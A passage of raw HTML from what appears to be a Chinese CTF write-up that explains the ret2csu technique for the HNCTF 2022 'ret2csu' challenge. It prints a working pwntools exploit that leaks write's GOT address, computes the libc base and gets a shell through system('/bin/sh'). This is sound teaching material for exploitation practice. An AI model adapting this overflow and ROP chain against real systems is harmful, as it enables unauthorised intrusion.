#ECEFF4\">()<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<h3 class=\"wp-block-heading\"><code>write<\/code>\u51fd\u6570<\/h3>\n\n\n\n<p><code>write<\/code>\u51fd\u6570\u6709\u4e09\u4e2a\u53c2\u6570\uff0c\u8fd9\u4e09\u4e2a\u53c2\u6570\u5206\u522b\u4f7f\u7528<code>rdi<\/code>\uff0c<code>rsi<\/code>\u548c<code>rdx<\/code>\u4e09\u4e2a\u5bc4\u5b58\u5668\uff0c\u5206\u522b\u5b58\u50a8\u6587\u4ef6\u63cf\u8ff0\u7b26<code>fd<\/code>\uff08\u901a\u5e38\u8bbe\u7f6e\u4e3a1\u8868\u793a\u8f93\u51fa\u6d41\uff09\uff0c\u8981\u8f93\u51fa\u7684\u6570\u636e<code>buf<\/code>\u4ee5\u53ca\u8f93\u51fa\u957f\u5ea6<code>n<\/code><\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-25.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-25.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"294\" height=\"93\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-25.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-158\"\/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u5728\u4e00\u822c\u60c5\u51b5\u4e0b\uff0c\u7a0b\u5e8f\u4e2d\u5e76\u4e0d\u4f1a\u521a\u521a\u597d\u540c\u65f6\u5305\u542b<code>pop rdi; retn<\/code>\uff0c<code>pop rsi; retn<\/code>\u4ee5\u53ca<code>pop rdx; 
retn<\/code>\u8fd9\u4e09\u6761\u8bed\u53e5\uff0c\u8fd9\u79cd\u65f6\u5019\u5c31\u8981\u6211\u4eec\u901a\u8fc7ret2csu\u6280\u672f\u6765\u63a7\u5236\u5bc4\u5b58\u5668\u5b58\u5165\u6211\u4eec\u60f3\u8981\u7684\u503c\u6765\u83b7\u53d6\u76ee\u6807\u51fd\u6570\u7684\u771f\u5b9e\u5730\u5740\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u4f8b\uff1a[HNCTF 2022 WEEK2]ret2csu<\/h4>\n\n\n\n<p>\u9898\u76ee\uff1a<a href=\"https:\/\/www.nssctf.cn\/problem\/2963\">HNCTF 2022 WEEK2-ret2csu | NSSCTF<\/a><\/p>\n\n\n\n<p>checksec\u53ef\u4ee5\u770b\u5230\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-26.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-26.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"237\" height=\"131\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-26.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-159\"\/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u6ca1\u6709\u4efb\u4f55\u4fdd\u62a4\uff0c\u6240\u4ee5\u53ef\u4ee5\u901a\u8fc7ret2libc\u6765\u83b7\u53d6shell\uff0c\u89c2\u5bdf\u51fd\u6570\u8868\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-27.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-27.png'><img 
class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"381\" height=\"366\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-27.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-160\"  sizes=\"auto, (max-width: 381px) 100vw, 381px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u53d1\u73b0\u6ca1\u6709<code>puts<\/code>\u51fd\u6570\uff0c\u53ea\u6709<code>write<\/code>\u51fd\u6570\uff0c\u6240\u4ee5\u6211\u4eec\u8981\u8003\u8651\u7528<code>write<\/code>\u51fd\u6570\u6765\u6cc4\u9732<code>libc<\/code>\u57fa\u5740\uff0c\u67e5\u627e<code>pop rdi<\/code>\uff0c<code>pop rsi<\/code>\u4ee5\u53ca<code>pop rdx<\/code>\u53ef\u4ee5\u770b\u5230\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-28.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-28.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"361\" height=\"97\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-28.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-161\"  sizes=\"auto, 
(max-width: 361px) 100vw, 361px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p><code>pop rdx<\/code>\u662f\u7f3a\u5931\u7684\uff0c\u6240\u4ee5\u6211\u4eec\u8981\u5229\u7528ret2csu\u6280\u672f\u6765\u5411\u8fd9\u4e09\u4e2a\u5bc4\u5b58\u5668\u5185\u7f6e\u5165\u6211\u4eec\u60f3\u8981\u7684\u503c\uff0c\u6211\u4eec\u8981\u5b58\u5165\u7684\u503c\u5982\u4e0b\u8868\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th>register<\/th><th>value<\/th><\/tr><\/thead><tbody><tr><td><code>rdi<\/code><\/td><td>1<\/td><\/tr><tr><td><code>rsi<\/code><\/td><td><code>write<\/code>\u51fd\u6570\u7684<code>got<\/code>\u8868\u5730\u5740<\/td><\/tr><tr><td><code>rdx<\/code><\/td><td>\u5199\u6570\u636e\u7684\u957f\u5ea6<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>ret2csu\u7684\u4e00\u4e9b\u7ec6\u8282\u5728\u8fd9\u91cc\u4e0d\u591a\u8d58\u8ff0\uff0c\u6211\u4eec\u76f4\u63a5\u770b<code>__libc_csu_init<\/code>\u51fd\u6570\u7684\u6c47\u7f16\uff0c\u53ef\u4ee5\u770b\u5230\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-29.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-29.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"722\" height=\"121\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-29.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-162\"  sizes=\"auto, (max-width: 722px) 100vw, 722px\" 
\/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u4ee5\u53ca\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-30.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-30.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"689\" height=\"134\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-30.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-163\"  sizes=\"auto, (max-width: 689px) 100vw, 689px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u4ece\u7b2c\u4e00\u5757\u53ef\u4ee5\u770b\u51fa\u5bc4\u5b58\u5668\u4e4b\u95f4\u6709\u5982\u4e0b\u5bf9\u5e94\u5173\u7cfb\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><code>r14<\/code>\u5bc4\u5b58\u5668\u5bf9\u5e94<code>rdx<\/code><\/li>\n\n\n\n<li><code>r13<\/code>\u5bc4\u5b58\u5668\u5bf9\u5e94<code>rsi<\/code><\/li>\n\n\n\n<li><code>r12<\/code>\u5bc4\u5b58\u5668\u7684\u4f4e32\u4f4d\u5bf9\u5e94<code>rdi<\/code>\u7684\u4f4e32\u4f4d\uff08\u5373<code>edi<\/code>\uff09<\/li>\n<\/ol>\n\n\n\n<p>\u6545\u5bf9\u4e8e\u7b2c\u4e8c\u5757\uff0c\u51e0\u4e2a\u5bc4\u5b58\u5668\u4e2d\u8981\u5b58\u5165\u7684\u503c\u5982\u4e0b\u8868\u6240\u793a\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table 
class=\"has-fixed-layout\"><thead><tr><th>register<\/th><th>value<\/th><\/tr><\/thead><tbody><tr><td><code>rbx<\/code><\/td><td>0<\/td><\/tr><tr><td><code>rbp<\/code><\/td><td>1<\/td><\/tr><tr><td><code>r12<\/code><\/td><td>1<\/td><\/tr><tr><td><code>r13<\/code><\/td><td><code>write<\/code>\u51fd\u6570\u7684<code>got<\/code>\u8868\u5730\u5740<\/td><\/tr><tr><td><code>r14<\/code><\/td><td>\u5199\u6570\u636e\u7684\u957f\u5ea6<\/td><\/tr><tr><td><code>r15<\/code><\/td><td><code>write<\/code>\u51fd\u6570\u7684<code>got<\/code>\u8868\u5730\u5740<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>\u6240\u4ee5\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u6784\u9020\u5982\u4e0bpayload\u6765\u83b7\u53d6<code>write<\/code>\u51fd\u6570\u7684got\u8868\u5730\u5740\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" 
readonly>payload = b'a' * 0x100 + b'=Triode=' + p64(pop_chain)  \npayload += p64(0)          #add rsp, 8\npayload += p64(0)          #pop rbx\npayload += p64(1)          #pop rbp\npayload += p64(1)          #pop r12\npayload += p64(write_got)  #pop r13\npayload += p64(0x100)      #pop r14\npayload += p64(write_got)  #pop r15\npayload += p64(mov_reg) + b'a' * 0x38 + p64(main)<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">a<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">100<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">=Triode=<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: 
#81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">pop_chain<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">          <\/span><span style=\"color: #616E88\">#add rsp, 8<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">          <\/span><span style=\"color: #616E88\">#pop rbx<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">1<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">          <\/span><span style=\"color: #616E88\">#pop rbp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">1<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">          <\/span><span style=\"color: #616E88\">#pop r12<\/span><\/span>\n<span 
class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">write_got<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #616E88\">#pop r13<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">100<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">      <\/span><span style=\"color: #616E88\">#pop r14<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">write_got<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #616E88\">#pop r15<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">mov_reg<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">a<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: 
#81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">38<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">main<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\u5176\u4e2d<code>pop_chain=0x4012A6<\/code>\u6307\u4ece\u6808\u9876<code>pop<\/code>\u5143\u7d20\u5230\u5bc4\u5b58\u5668\u7684\u90a3\u4e32\u6c47\u7f16\uff0c<code>mov_reg=0x401290<\/code>\u6307\u79fb\u52a8\u5bc4\u5b58\u5668\u7684\u90a3\u4e32\u6c47\u7f16\u3002<\/p>\n\n\n\n<p>\u90a3\u4e48\u6211\u4eec\u5c31\u53ef\u4ee5\u901a\u8fc7ret2libc\u6765\u83b7\u5f97shell\u4e86\uff0c\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" 
aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>from pwn import *  \n\np = remote(\"node5.anna.nssctf.cn\", 21504)  \n\nelf = ELF(\".\/ret2csu\")  \nlibc = ELF(\".\/libc.so.6\")  \n\nwrite_plt = elf.plt&#91;\"write\"&#93;  \nwrite_got = elf.got&#91;\"write\"&#93;  \nmain = 0x4011DC  \n\n\"\"\"  \nwrite(fd, buf, count)  \nfd: rdi  \nbuf: rsi  \ncount: rdx  \n\"\"\"  \n\npop_chain = 0x4012A6  \nmov_reg = 0x401290  \npop_rdi = 0x4012b3  \nret = 0x40101a  \n\npayload = b'a' * 0x100 + b'=Triode=' + p64(pop_chain)  \npayload += p64(0)  \npayload += p64(0)  \npayload += p64(1)  \npayload += p64(1)  \npayload += p64(write_got)  \npayload += p64(0x100)  \npayload += p64(write_got)  \npayload += p64(mov_reg) + b'a' * 0x38 + p64(main)  \n\np.sendlineafter(b\"Input:\\n\", payload)  \nwrite_real_addr = u64(p.recvuntil(b\"\\x7f\")&#91;-6:&#93;.ljust(8, b\"\\x00\"))  \nprint(\"&#91;+&#93; the real address of write is\", hex(write_real_addr))  \n\nlibc_base = write_real_addr - libc.sym&#91;\"write\"&#93;  \nprint(\"&#91;+&#93; the base address of libc is\", hex(libc_base))  \n\nsystem = libc_base + libc.sym&#91;\"system\"&#93;  \nsh = libc_base + next(libc.search(b\"\/bin\/sh\"))  \nprint(\"&#91;+&#93; the address of system is\", hex(system))  \nprint(\"&#91;+&#93; the address of \/bin\/sh is\", hex(sh))  \n\npayload = b'a' * 0x100 + b'=Triode=' + p64(pop_rdi) + p64(sh) + p64(system) + p64(ret)  \n\np.sendlineafter(b\"Input:\\n\", payload)  \n\np.interactive()<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" 
stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #81A1C1\">from<\/span><span style=\"color: #D8DEE9FF\"> pwn <\/span><span style=\"color: #81A1C1\">import<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">remote<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">node5.anna.nssctf.cn<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #B48EAD\">21504<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">elf <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">ELF<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">.\/ret2csu<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">libc <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">ELF<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span 
